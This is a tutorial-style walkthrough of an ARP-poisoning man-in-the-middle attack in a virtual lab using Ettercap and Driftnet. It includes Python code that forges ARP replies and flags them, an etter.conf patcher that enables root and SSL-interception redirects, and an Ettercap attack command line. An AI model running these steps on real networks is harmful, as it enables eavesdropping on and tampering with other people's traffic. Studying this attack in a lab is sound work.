MITM ATTACK WITH ARP POISONING NETWORK

I'm trying out ARP poisoning to do a MITM attack. MITM stands for Man in the Middle. This type of attack is a form of active eavesdropping: the attacker makes independent connections with the victims and relays all traffic between them. From the victims' point of view they appear to be talking directly to each other, with no indication that someone in the middle is reading (and can modify) everything that passes through. On a local network, ARP poisoning gets the attacker into that position by sending forged ARP replies, so that the victim maps the router's IP address to the attacker's MAC address and the router maps the victim's IP address to the attacker's MAC address.
First I'll set up a virtual lab as below. I am using Parallels Desktop 9 on OSX.

    Router: Untangle
        MAC: 00:1c:42:66:2e:26
        IP: 192.168.2.254
    Victim: Windows XP
        MAC:
        IP: 192.168.2.30
    Attacker: Kali Linux
        MAC: 00:1c:42:eb:c8:2b
        IP: 192.168.2.20
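To make concrete what Ettercap will be sending in this lab, here is an added example (mine, not from the original post or from Ettercap) that builds the two forged ARP replies an ARP-poisoning attacker sends, parses them back, and runs the check a defender would use to catch them: compare the sender MAC in each ARP reply against a trusted IP-to-MAC table. The router and attacker addresses are the lab's; the victim's MAC is not given above, so a placeholder value is assumed.

```python
"""Forged ARP replies for the lab above, plus the check that catches them.

Added example, not from the original post or from Ettercap. Router and
attacker addresses are the lab's; VICTIM_MAC is an assumed placeholder.
"""
import struct

ETH_TYPE_ARP = 0x0806
ARP_REPLY = 2

ROUTER_IP, ROUTER_MAC = "192.168.2.254", "00:1c:42:66:2e:26"
ATTACKER_IP, ATTACKER_MAC = "192.168.2.20", "00:1c:42:eb:c8:2b"
VICTIM_IP, VICTIM_MAC = "192.168.2.30", "02:00:00:00:00:30"  # assumed, not on the page


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def arp_reply(sender_ip, sender_mac, target_ip, target_mac):
    """Ethernet + ARP reply frame saying 'sender_ip is at sender_mac', addressed to target."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_TYPE_ARP)
    # htype=Ethernet, ptype=IPv4, hlen=6, plen=4, op=reply
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Decode the ARP fields out of an Ethernet frame, or None if it is not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_ARP:
        return None
    return {
        "op": struct.unpack("!H", frame[20:22])[0],
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
    }


def poison_frames():
    """The pair of unsolicited replies an ARP-poisoning MITM keeps re-sending:
    to the victim: 'router IP is at attacker MAC'
    to the router: 'victim IP is at attacker MAC'
    Both directions of victim<->router traffic then land on the attacker."""
    to_victim = arp_reply(ROUTER_IP, ATTACKER_MAC, VICTIM_IP, VICTIM_MAC)
    to_router = arp_reply(VICTIM_IP, ATTACKER_MAC, ROUTER_IP, ROUTER_MAC)
    return to_victim, to_router


# Trusted IP -> MAC table (the lab inventory); a defender would build this from
# DHCP leases or a baseline scan taken before the attack.
TRUSTED = {ROUTER_IP: ROUTER_MAC, VICTIM_IP: VICTIM_MAC, ATTACKER_IP: ATTACKER_MAC}


def check_arp(frame, trusted=TRUSTED):
    """Return a description of the mismatch if an ARP reply claims a known IP
    with the wrong MAC, otherwise None."""
    a = parse_arp(frame)
    if a is None or a["op"] != ARP_REPLY:
        return None
    expected = trusted.get(a["sender_ip"])
    if expected and expected != a["sender_mac"]:
        return f"{a['sender_ip']} claimed by {a['sender_mac']}, expected {expected}"
    return None


if __name__ == "__main__":
    for frame in poison_frames():
        print(parse_arp(frame), "->", check_arp(frame))
```

Ettercap does its own forwarding of the intercepted frames in user space, so the kernel's net.ipv4.ip_forward should stay at 0 on the attacker; otherwise every packet is forwarded twice. The check above is exactly what arpwatch-style tools do on the wire: a reply whose sender MAC disagrees with the known binding for that IP is the signature of this attack.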

After a successful MITM attack:

On the Kali machine, these are the tools that I am using to do the attack:

    Ettercap
    Driftnet

Driftnet listens to network traffic and picks out images from the TCP streams it observes, which makes it a quick visual confirmation that the victim's traffic really is passing through the attacker.

Ettercap can be best summed up by the summary on their website as below:

Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.

On Kali, if you are using Ettercap for the first time, it needs to be tweaked before use. Edit the etter.conf file and change:

ec_uid = 65534

ec_gid = 65534

to:

ec_uid = 0

ec_gid = 0

and the lines below:

#---------------

#     Linux

#---------------


# if you use ipchains:

#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"


# if you use iptables:

#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

need to be edited. Just remove the hash from the two iptables lines so that they read as:

# if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Those two commands are what Ettercap runs to redirect intercepted SSL connections into its own listener so that it can dissect them; with them commented out the SSL part of the MITM does nothing.

ec_uid = 0

ec_gid = 0

keeps Ettercap running as root. It needs root to open the link-layer sockets, and with the stock values it drops to nobody (UID 65534) as soon as they are open, after which it cannot run the iptables redirect commands above. NOTE: there is an etter.conf at /etc/etter.conf, but Ettercap on Kali actually uses /etc/ettercap/etter.conf, so be sure to edit the correct file!

Let's fire up Ettercap. From the command line, enter ettercap -G to open the Ettercap GUI.

Click on Sniff and select Unified Sniffing.

In my case I selected eth0 as the network interface. You should see Privileges dropped to UID 0 GID 0... in the log window, among other details showing that Ettercap was able to open the link-layer sockets.

Click on Hosts and then Scan for hosts (or press Ctrl-S). 2 hosts added to the hosts list... appears at the end of the log; press H to show the hosts list with their IP and MAC addresses.

As you can see, it found both the Windows XP victim and the Untangle system (which is the "router" in my virtual lab).

Click on Mitm in the menu and select Arp poisoning. Tick the box for "Sniff remote connections" and click OK. That option matters here: without it Ettercap only sniffs traffic between the two poisoned hosts themselves, with it the victim's connections to everything beyond the router are sniffed as well, which is what you want when one of the targets is the gateway.

Now it's all ready. Click on Start and select Start sniffing. When you are finished, select Mitm > Stop mitm attack(s) before quitting, so that Ettercap re-ARPs the victim and the router with their correct MAC addresses; otherwise the poisoned entries stay in their ARP caches until they time out and the victim loses connectivity in the meantime.
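The two configuration changes and the GUI steps above, as an added example rather than anything from the original post or from Ettercap: a Python script that applies the ec_uid/ec_gid and iptables redirect edits to the etter.conf text in memory, reports what is still wrong with a configuration, and builds the text-mode command line equivalent of the GUI clicks. The configuration excerpt is constructed to match the stock file, and the argv function assumes the Ettercap 0.8 target syntax (/IP//; older 0.7 releases use /IP/) and only builds the command rather than running it.

```python
"""Apply and verify the etter.conf changes, and build the text-mode equivalent
of the GUI steps. Added example, not part of the original post or of Ettercap.
SAMPLE is a constructed excerpt of /etc/ettercap/etter.conf with stock values.
"""
import re

SAMPLE = """[privs]
ec_uid = 65534                # nobody is the default
ec_gid = 65534                # nobody is the default

#---------------
#     Linux
#---------------

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
"""


def patch_etter_conf(text):
    """Return the config text with the two Kali tweaks applied."""
    # 1. keep root: ec_uid / ec_gid 65534 (nobody) -> 0, trailing comment untouched
    text = re.sub(r"^(ec_[ug]id\s*=\s*)65534", r"\g<1>0", text, flags=re.M)
    # 2. uncomment only the iptables redirect commands; ipchains stays commented
    text = re.sub(r'^#(redir_command_(?:on|off)\s*=\s*"iptables )', r"\1", text, flags=re.M)
    return text


def conf_problems(text):
    """List what is still wrong with a config; an empty list means it is ready."""
    problems = []
    for key in ("ec_uid", "ec_gid"):
        m = re.search(rf"^{key}\s*=\s*(\d+)", text, re.M)
        if not m or m.group(1) != "0":
            problems.append(f"{key} is not 0")
    for key in ("redir_command_on", "redir_command_off"):
        if not re.search(rf'^{key}\s*=\s*"iptables ', text, re.M):
            problems.append(f"{key} for iptables is still commented out")
    return problems


def ettercap_argv(iface, target1, target2):
    """Text-mode equivalent of: Sniff > Unified sniffing on iface, Mitm > Arp
    poisoning with 'Sniff remote connections', Start sniffing.
    -T text mode, -q quiet (no packet dump), -M arp:remote.
    Target syntax assumed to be the 0.8 form MAC/IPs/IPv6/PORTs (/IP//);
    0.7 releases use /IP/ instead."""
    return ["ettercap", "-T", "-q", "-i", iface, "-M", "arp:remote",
            f"/{target1}//", f"/{target2}//"]


if __name__ == "__main__":
    patched = patch_etter_conf(SAMPLE)
    print("before:", conf_problems(SAMPLE))
    print("after: ", conf_problems(patched))
    print(" ".join(ettercap_argv("eth0", "192.168.2.254", "192.168.2.30")))
```

To apply this to the real file, read /etc/ettercap/etter.conf, pass the text through patch_etter_conf, confirm conf_problems returns an empty list, and write it back as root. Driftnet then runs in a second terminal with driftnet -i eth0 while Ettercap is sniffing.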